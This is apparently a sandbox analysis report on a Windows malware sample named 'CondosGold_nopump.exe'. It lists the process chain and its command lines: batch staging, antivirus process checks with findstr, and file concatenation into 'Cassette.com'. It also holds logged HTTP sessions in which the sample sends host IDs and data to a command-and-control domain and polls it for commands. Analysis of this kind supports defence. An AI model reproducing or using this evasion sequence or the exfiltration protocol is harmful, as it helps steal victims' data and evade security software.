51 6f 65 35 71 79 Data Ascii: DnDe3s1bnUms1lf3EhlHRgXreB6+YBKajk+F/8ObsKpXRdIqmb8l8Ox6C84rqSZKUBPZw5sxapJfQrzz3q74g04oipPNW51JrNZX9xJtb2JtR4yC5oSrJl5fnf/KNlnDknzenum+ZMTkqxabGh0TbnUeiFYTdJfKGkPl78ObsPpXRdKqmb8l8NTWf+ca1GMXNUqBo7dFU9sXItzu+pa0x24omtbJrz3w+DLvRjatG0ZxJ5CaAoTPigJfJQoe5qy

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.7	49964	104.21.48.1	443	8088	C:\Users\user\AppData\Local\Temp\352348\Cassette.com

Timestamp	Bytes transferred	Direction	Data
2025-01-10 10:41:53 UTC	283	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=QYHUCHM22YIJLXSN1H1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12857 Host: sputnik-1985.com
2025-01-10 10:41:53 UTC	12857	OUT	Data Raw: 2d 2d 51 59 48 55 43 48 4d 32 32 59 49 4a 4c 58 53 4e 31 48 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 45 46 35 39 37 39 34 33 34 43 42 34 44 44 32 30 30 44 35 37 46 39 44 44 44 33 37 42 45 30 43 0d 0a 2d 2d 51 59 48 55 43 48 4d 32 32 59 49 4a 4c 58 53 4e 31 48 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 51 59 48 55 43 48 4d 32 32 59 49 4a 4c 58 53 4e 31 48 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 66 65 Data Ascii: --QYHUCHM22YIJLXSN1H1Content-Disposition: form-data; name="hwid"0EF5979434CB4DD200D57F9DDD37BE0C--QYHUCHM22YIJLXSN1H1Content-Disposition: form-data; name="pid"2--QYHUCHM22YIJLXSN1H1Content-Disposition: form-data; name="lid"HpOoIh--fe
2025-01-10 10:41:55 UTC	1133	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 10:41:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=l5qf8som60c4kuc95iauju9anr; expires=Tue, 06 May 2025 04:28:32 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kP1biE43PcyeusDSATeKmZy6qpnIyB84d%2BAAt3P69tciR5j3jq1IC05ezRYYJLB3VX83M4QCMecufb1v%2BkfN4skZ8Mz%2Bh3Njkfr1oSicomw%2B3%2F%2BJgJwqvWyDzsNTzSiL%2BTFD"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ffc0ea58b7bc461-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1695&min_rtt=1692&rtt_var=640&sent=8&recv=16&lost=0&retrans=0&sent_bytes=2839&recv_bytes=13798&delivery_rate=1700640&cwnd=228&unsent_bytes=0&cid=b067b6779785eb7d&ts=2092&x=0"
2025-01-10 10:41:55 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-10 10:41:55 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.7	49976	104.21.48.1	443	8088	C:\Users\user\AppData\Local\Temp\352348\Cassette.com

Timestamp	Bytes transferred	Direction	Data
2025-01-10 10:41:56 UTC	273	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=U0LF5668B User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15029 Host: sputnik-1985.com
2025-01-10 10:41:56 UTC	15029	OUT	Data Raw: 2d 2d 55 30 4c 46 35 36 36 38 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 45 46 35 39 37 39 34 33 34 43 42 34 44 44 32 30 30 44 35 37 46 39 44 44 44 33 37 42 45 30 43 0d 0a 2d 2d 55 30 4c 46 35 36 36 38 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 55 30 4c 46 35 36 36 38 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 66 65 33 32 37 62 38 32 63 32 37 36 0d 0a 2d 2d 55 30 4c 46 35 36 36 38 42 0d 0a 43 6f 6e 74 65 Data Ascii: --U0LF5668BContent-Disposition: form-data; name="hwid"0EF5979434CB4DD200D57F9DDD37BE0C--U0LF5668BContent-Disposition: form-data; name="pid"2--U0LF5668BContent-Disposition: form-data; name="lid"HpOoIh--fe327b82c276--U0LF5668BConte
2025-01-10 10:41:56 UTC	1127	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 10:41:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=9gnoueqapopilioppflmn9igb0; expires=Tue, 06 May 2025 04:28:35 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vHEbzwYY304%2FgkeMpy4KjRB3yV21BYX72CxEr1R9AvS6TiHHdvIhhiQM9f%2BklEaL%2FxVGPAgPh9q3yDSACMoSTstz0RVxFVV0awZEjX4mWctg6rF8wHrTEQLFfWg%2BjoKLaJhl"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ffc0eb63b6443be-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1559&min_rtt=1547&rtt_var=605&sent=10&recv=19&lost=0&retrans=0&sent_bytes=2840&recv_bytes=15960&delivery_rate=1772920&cwnd=226&unsent_bytes=0&cid=28be16cb8b3b70f5&ts=573&x=0"
2025-01-10 10:41:56 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-10 10:41:56 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.7	49977	104.21.48.1	443	8088	C:\Users\user\AppData\Local\Temp\352348\Cassette.com

Timestamp	Bytes transferred	Direction	Data
2025-01-10 10:41:57 UTC	280	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=VML4DY57Q5LIR4EX User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20396 Host: sputnik-1985.com
2025-01-10 10:41:57 UTC	15331	OUT	Data Raw: 2d 2d 56 4d 4c 34 44 59 35 37 51 35 4c 49 52 34 45 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 45 46 35 39 37 39 34 33 34 43 42 34 44 44 32 30 30 44 35 37 46 39 44 44 44 33 37 42 45 30 43 0d 0a 2d 2d 56 4d 4c 34 44 59 35 37 51 35 4c 49 52 34 45 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 56 4d 4c 34 44 59 35 37 51 35 4c 49 52 34 45 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 66 65 33 32 37 62 38 32 63 32 37 Data Ascii: --VML4DY57Q5LIR4EXContent-Disposition: form-data; name="hwid"0EF5979434CB4DD200D57F9DDD37BE0C--VML4DY57Q5LIR4EXContent-Disposition: form-data; name="pid"3--VML4DY57Q5LIR4EXContent-Disposition: form-data; name="lid"HpOoIh--fe327b82c27
2025-01-10 10:41:57 UTC	5065	OUT	Data Raw: 00 00 00 00 00 00 00 00 b6 b9 fe 28 58 da f6 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 36 d7 17 05 4b db 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e6 fa a3 60 69 db 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 db 5c 5f 14 2c 6d fb 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 9b eb 8f 82 a5 6d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 73 7d 51 b0 b4 ed a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 6d ae 2f f8 f5 58 32 78 29 Data Ascii: (X6K~`iO\_,mi`m?ls}Qm/X2x)
2025-01-10 10:41:57 UTC	1125	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 10:41:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=k9ubqkgtb39tg2e90qnk7jfq0j; expires=Tue, 06 May 2025 04:28:36 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZcP4px6bWpJg%2Bh3SEzP8HS5TUeVKAWulMz6nKtQm3iztsCFOGNAFwtnwLwFQ2MTCF7mRZuaH8WHiqIoudnZB9Dl%2FBcuMorLk9LAapF79SRy7qQTeHnfWi6QxbW6bg%2BfCZENq"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ffc0ebd3ae2c461-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1948&min_rtt=1699&rtt_var=815&sent=11&recv=25&lost=0&retrans=0&sent_bytes=2840&recv_bytes=21356&delivery_rate=1718658&cwnd=228&unsent_bytes=0&cid=1efb70dd24e6be4d&ts=627&x=0"
2025-01-10 10:41:57 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-10 10:41:57 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.7	49978	104.21.48.1	443	8088	C:\Users\user\AppData\Local\Temp\352348\Cassette.com

Timestamp	Bytes transferred	Direction	Data
2025-01-10 10:41:58 UTC	278	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=FAIUP7TL6R3VMFI User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1202 Host: sputnik-1985.com
2025-01-10 10:41:58 UTC	1202	OUT	Data Raw: 2d 2d 46 41 49 55 50 37 54 4c 36 52 33 56 4d 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 45 46 35 39 37 39 34 33 34 43 42 34 44 44 32 30 30 44 35 37 46 39 44 44 44 33 37 42 45 30 43 0d 0a 2d 2d 46 41 49 55 50 37 54 4c 36 52 33 56 4d 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 46 41 49 55 50 37 54 4c 36 52 33 56 4d 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 66 65 33 32 37 62 38 32 63 32 37 36 0d 0a Data Ascii: --FAIUP7TL6R3VMFIContent-Disposition: form-data; name="hwid"0EF5979434CB4DD200D57F9DDD37BE0C--FAIUP7TL6R3VMFIContent-Disposition: form-data; name="pid"1--FAIUP7TL6R3VMFIContent-Disposition: form-data; name="lid"HpOoIh--fe327b82c276
2025-01-10 10:41:59 UTC	1120	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 10:41:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=n0n6dhvgiam5dde5q6okctrgt8; expires=Tue, 06 May 2025 04:28:37 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kMUhDnPE4U2lhrlCHEUjwSkwP4S0jwXw%2FfO7g5dozGDSBIJwzPdOGnvDEQyJVNpB6XW0s8%2BsOKuEvY4IQ5ovlyld15eivvIF703NeVAvazRw2jRo4TQLQe7OgJCHCS98ZBtx"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ffc0ec62c72c323-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1467&min_rtt=1460&rtt_var=562&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2839&recv_bytes=2116&delivery_rate=1923583&cwnd=214&unsent_bytes=0&cid=6c92b5022bc4694c&ts=450&x=0"
2025-01-10 10:41:59 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-10 10:41:59 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.7	49980	104.21.48.1	443	8088	C:\Users\user\AppData\Local\Temp\352348\Cassette.com

Timestamp	Bytes transferred	Direction	Data
2025-01-10 10:41:59 UTC	282	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=N1AZX6WPXLKO69P0WK1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1159 Host: sputnik-1985.com
2025-01-10 10:41:59 UTC	1159	OUT	Data Raw: 2d 2d 4e 31 41 5a 58 36 57 50 58 4c 4b 4f 36 39 50 30 57 4b 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 45 46 35 39 37 39 34 33 34 43 42 34 44 44 32 30 30 44 35 37 46 39 44 44 44 33 37 42 45 30 43 0d 0a 2d 2d 4e 31 41 5a 58 36 57 50 58 4c 4b 4f 36 39 50 30 57 4b 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4e 31 41 5a 58 36 57 50 58 4c 4b 4f 36 39 50 30 57 4b 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 66 65 Data Ascii: --N1AZX6WPXLKO69P0WK1Content-Disposition: form-data; name="hwid"0EF5979434CB4DD200D57F9DDD37BE0C--N1AZX6WPXLKO69P0WK1Content-Disposition: form-data; name="pid"1--N1AZX6WPXLKO69P0WK1Content-Disposition: form-data; name="lid"HpOoIh--fe
2025-01-10 10:42:00 UTC	1120	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 10:42:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=k2qd4fomf4qoqiskda5a4ocu9m; expires=Tue, 06 May 2025 04:28:39 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DJh1InZxs8gW7kcCQjVOEjql3pxNUcGALURGjZ694hIp21tECErbkPqaUu0bbdLk2gHYmYKYPRAMNf%2FF90D%2FyByeivA6NmJhVMimihxtLq3MPAkEC0A5mzw2aWgr5LvfR3oB"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ffc0ecd1da7c461-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1662&min_rtt=1658&rtt_var=631&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2839&recv_bytes=2077&delivery_rate=1721698&cwnd=228&unsent_bytes=0&cid=3838c1ce000817eb&ts=719&x=0"
2025-01-10 10:42:00 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-10 10:42:00 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.7	49981	104.21.48.1	443	8088	C:\Users\user\AppData\Local\Temp\352348\Cassette.com

Timestamp	Bytes transferred	Direction	Data
2025-01-10 10:42:00 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 121 Host: sputnik-1985.com
2025-01-10 10:42:00 UTC	121	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 70 4f 6f 49 68 2d 2d 66 65 33 32 37 62 38 32 63 32 37 36 26 6a 3d 62 39 61 62 63 37 36 63 65 35 33 62 36 66 63 33 61 30 33 35 36 36 66 38 66 37 36 34 66 35 65 61 26 68 77 69 64 3d 30 45 46 35 39 37 39 34 33 34 43 42 34 44 44 32 30 30 44 35 37 46 39 44 44 44 33 37 42 45 30 43 Data Ascii: act=get_message&ver=4.0&lid=HpOoIh--fe327b82c276&j=b9abc76ce53b6fc3a03566f8f764f5ea&hwid=0EF5979434CB4DD200D57F9DDD37BE0C
2025-01-10 10:42:01 UTC	1122	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 10:42:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=2ivgu0r84bkjjnjo7ob6q27v5r; expires=Tue, 06 May 2025 04:28:40 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kHm8f7HqiWP5fB00nivQPP6F%2Bdf2d65ZVLrCv6v3YoWLSGemVpD5JDxYnGpqt9rZPS7LJ6%2BX40AfsWYUyduTb0sYHi4AgJqdmw558sKHbKnv3YnfJ0EbOJl7F%2FvluplObiAk"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ffc0ed3cb6043be-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1655&min_rtt=1614&rtt_var=634&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2839&recv_bytes=1022&delivery_rate=1809169&cwnd=226&unsent_bytes=0&cid=700e0fe01d401994&ts=750&x=0"
2025-01-10 10:42:01 UTC	54	IN	Data Raw: 33 30 0d 0a 72 71 50 4c 77 64 61 6c 6d 69 75 47 62 2b 77 4f 70 6f 53 46 30 62 2b 79 67 39 4a 49 4b 61 61 74 61 70 4e 65 34 35 32 6e 2f 67 2f 31 2f 67 3d 3d 0d 0a Data Ascii: 30rqPLwdalmiuGb+wOpoSF0b+yg9JIKaatapNe452n/g/1/g==
2025-01-10 10:42:01 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	5
Start time:	05:41:03
Start date:	10/01/2025
Path:	C:\Users\user\Desktop\CondosGold_nopump.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\CondosGold_nopump.exe"
Imagebase:	0x400000
File size:	1'378'152 bytes
MD5 hash:	412DB12259A7D002A629959260898EA7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Target ID:	7
Start time:	05:41:04
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c move Drives Drives.cmd & Drives.cmd
Imagebase:	0x410000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	8
Start time:	05:41:04
Start date:	10/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	9
Start time:	05:41:06
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0x650000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	10
Start time:	05:41:06
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /I "opssvc wrsa"
Imagebase:	0x7c0000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	12
Start time:	05:41:06
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0x650000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	13
Start time:	05:41:07
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Imagebase:	0x7c0000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	14
Start time:	05:41:07
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c md 352348
Imagebase:	0x410000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	15
Start time:	05:41:07
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\extrac32.exe
Wow64 process (32bit):	true
Commandline:	extrac32 /Y /E Fat
Imagebase:	0xe60000
File size:	29'184 bytes
MD5 hash:	9472AAB6390E4F1431BAA912FCFF9707
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Target ID:	16
Start time:	05:41:08
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /V "CERTAIN" Panties
Imagebase:	0x7c0000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	17
Start time:	05:41:08
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c copy /b ..\Singapore + ..\Vegetarian + ..\Dating + ..\Wings + ..\Audit + ..\Relates + ..\Trip E
Imagebase:	0x410000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	18
Start time:	05:41:08
Start date:	10/01/2025
Path:	C:\Users\user\AppData\Local\Temp\352348\Cassette.com
Wow64 process (32bit):	true
Commandline:	Cassette.com E
Imagebase:	0x4f0000
File size:	947'288 bytes
MD5 hash:	62D09F076E6E0240548C2F837536A46A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Has exited:	true

Target ID:	19
Start time:	05:41:09
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\choice.exe
Wow64 process (32bit):	true
Commandline:	choice /d y /t 5
Imagebase:	0xd70000
File size:	28'160 bytes
MD5 hash:	FCE0E41C87DC4ABBE976998AD26C27E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true